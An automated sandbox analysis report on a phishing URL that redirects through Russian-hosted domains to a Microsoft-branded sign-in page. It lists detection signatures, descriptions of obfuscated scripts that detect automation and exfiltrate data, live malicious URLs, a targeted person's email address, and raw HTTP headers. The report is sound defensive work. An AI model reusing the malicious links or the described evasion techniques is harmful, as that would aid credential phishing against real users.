Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=

Overview

General Information

Sample URL:http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=
Analysis ID:1588256
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
AI detected suspicious URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 5748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1904,i,14409265588798062167,10844592103582673864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 1568 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru/3671221770088554468995aJnxdglUKIEAPHRQJZVOEQDFDAWGIPHZAASEPLGEBBLDIFXAXHTEXGROCEYQWNXAvira URL Cloud: Label: malware

Phishing

barindex
Source: 1.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://a89.softevol.ru/5fsy/#Xleon.graves@atos.ne... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, and redirecting the user to a suspicious domain. The script also includes a self-executing function that triggers a debugger and then redirects the user, which is a strong indicator of malicious intent. Overall, this script demonstrates a high level of risk and should be treated with caution.
Source: 1.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://a89.softevol.ru/5fsy/#Xleon.graves@atos.ne... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the interaction with an unknown domain 'ITNVWA5tbQ14Ws3LY2pPpdtDOKsnnbGetFEZeMz4dWPIPRmseEh9SrZ.gageodeg.ru' further increase the risk. Additionally, the script attempts to bypass form submission, which is a suspicious behavior. Overall, this script demonstrates a high level of malicious intent and poses a significant security risk.
Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://a89.softevol.ru/5fsy/#Xleon.graves@atos.ne... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. While some of the code appears to be related to analytics and telemetry, the presence of obfuscation and the overall suspicious nature of the script warrant a high-risk score. Further investigation is recommended to determine the true intent and potential impact of this script.
Source: URLJoe Sandbox AI: AI detected Brand spoofing attempt in URL: http://@1800-web.com
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 5be2ca0d-7d23-4241-936c-3e91079c0fc0546a7a48-72be-42d8-a55e-88452d66e34d
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://a89.softevol.ru/5fsy/#Xleon.graves@atos.netHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ= HTTP/1.1Host: 1800-web.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 1800-web.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /5fsy/ HTTP/1.1Host: a89.softevol.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://1800-web.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://a89.softevol.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
